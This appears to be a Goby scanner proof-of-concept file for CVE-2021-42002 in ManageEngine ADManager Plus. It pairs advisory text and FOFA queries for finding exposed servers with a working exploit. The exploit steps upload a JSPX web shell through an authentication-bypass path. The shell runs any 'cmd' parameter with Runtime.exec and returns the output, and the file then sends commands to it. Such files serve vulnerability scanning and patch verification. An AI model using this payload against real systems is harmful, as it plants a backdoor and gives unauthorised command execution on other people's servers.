mirror of https://github.com/qwqdanchun/Goby.git
{
|
||
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
|
||
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is </span>an Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus 7114 and earlier is affected by a filter bypass that leads to file upload and remote code execution. This <span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed in version </span><strong style=\"color: rgb(54, 71, 79);\">7115</strong>.</span><br></p>",
|
||
"Product": "ManageEngine ADManager Plus",
|
||
"Homepage": "https://www.manageengine.com/",
|
||
"DisclosureDate": "2021-11-11",
|
||
"Author": "Flip_FI",
|
||
"FofaQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
|
||
"GobyQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
|
||
"Level": "3",
|
||
"Impact": "<p>An attacker can bypass the permission check and directly upload a malicious JSPX file, then remotely execute arbitrary system commands to obtain server privileges, which poses a severe risk.<br></p>",
|
||
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a fix; upgrade to version 7115 or later: <span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span>. Upgrading does not remove files that were uploaded before the fix, so also review the server for unexpected .jspx files served under /ompemberapp/PasswordExpiryNotification/.</span><br></p>",
|
||
"References": [
|
||
"https://www.manageengine.com/products/ad-manager/release-notes.html#7115"
|
||
],
|
||
"Is0day": false,
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"name": "cmd",
|
||
"type": "input",
|
||
"value": "whoami",
|
||
"show": ""
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
|
||
"follow_redirect": false,
|
||
"header": {
|
||
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
|
||
},
|
||
"data_type": "text",
|
||
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tout.println(\"c4ca4238a0b923820dcc509a6f75849b\");\n\t]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "SUCCESS",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "c4ca4238a0b923820dcc509a6f75849b",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
|
||
},
|
||
"data_type": "text",
|
||
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tString cmd = pageContext.getRequest().getParameter(\"cmd\");\n\tif (cmd != null&&!\"\".equals(cmd)) {\n\ttry{\n\t\tProcess p = Runtime.getRuntime().exec(cmd);\n\t\tInputStream in = p.getInputStream();\n\t\tBufferedReader br = new BufferedReader(new InputStreamReader(in,\"GBK\"));\n\t\tString brs = br.readLine();\n\t\twhile(brs!=null){\n\t\t\tout.println(brs+\"</br>\");\n\t\t\tbrs = br.readLine();\n\t\t}\n\t\t}catch(Exception ex){\n\t\t\tout.println(ex.toString());\n\t\t}\n\t}]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "SUCCESS",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"data_type": "text",
|
||
"data": "cmd={{{cmd}}}"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|([\\w\\W]+)"
|
||
]
|
||
}
|
||
],
|
||
"Tags": [
|
||
"Code Execution",
|
||
"File Upload"
|
||
],
|
||
"VulType": [
|
||
"Code Execution",
|
||
"File Upload"
|
||
],
|
||
"CVEIDs": [
|
||
"CVE-2021-42002"
|
||
],
|
||
"CNNVD": [
|
||
"CNNVD-202111-1073"
|
||
],
|
||
"CNVD": [
|
||
"CNVD-2021-88234"
|
||
],
|
||
"CVSSScore": "9.8",
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "ManageEngine ADManager Plus 任意文件上传漏洞(CVE-2021-42002)",
|
||
"Product": "ManageEngine ADManager Plus",
|
||
"Description": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus 是Zoho公司开发的</span>一个 Active Directory (AD) 管理和报告解决方案,它允许 IT 管理员和技术人员轻松管理 AD 对象并单击按钮生成即时报告!</p><p><span style=\"color: var(--primaryFont-color);\">ManageEngine ADManager Plus <= 7114 存在权限绕过漏洞,导致未授权用户允许上传JSPX文件至网站目录,达到任意代码执行目的。</span></p>",
|
||
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">厂商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span><br></p>",
|
||
"Impact": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(22, 51, 102);\">攻击者通过权限绕过直接上传木马jspx文件,可远程执行任意系统命令获取服务器权限,风险极大</span></span></p>",
|
||
"VulType": [
|
||
"代码执行",
|
||
"文件上传"
|
||
],
|
||
"Tags": [
|
||
"代码执行",
|
||
"文件上传"
|
||
]
|
||
},
|
||
"EN": {
|
||
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
|
||
"Product": "ManageEngine ADManager Plus",
|
||
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is </span>an Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus 7114 and earlier is affected by a filter bypass that leads to file upload and remote code execution. This <span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed in version </span><strong style=\"color: rgb(54, 71, 79);\">7115</strong>.</span><br></p>",
|
||
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a fix; upgrade to version 7115 or later: <span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span>. Upgrading does not remove files that were uploaded before the fix, so also review the server for unexpected .jspx files served under /ompemberapp/PasswordExpiryNotification/.</span><br></p>",
|
||
"Impact": "<p>An attacker can bypass the permission check and directly upload a malicious JSPX file, then remotely execute arbitrary system commands to obtain server privileges, which poses a severe risk.<br></p>",
|
||
"VulType": [
|
||
"Code Execution",
|
||
"File Upload"
|
||
],
|
||
"Tags": [
|
||
"Code Execution",
|
||
"File Upload"
|
||
]
|
||
}
|
||
},
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
}
|
||
} |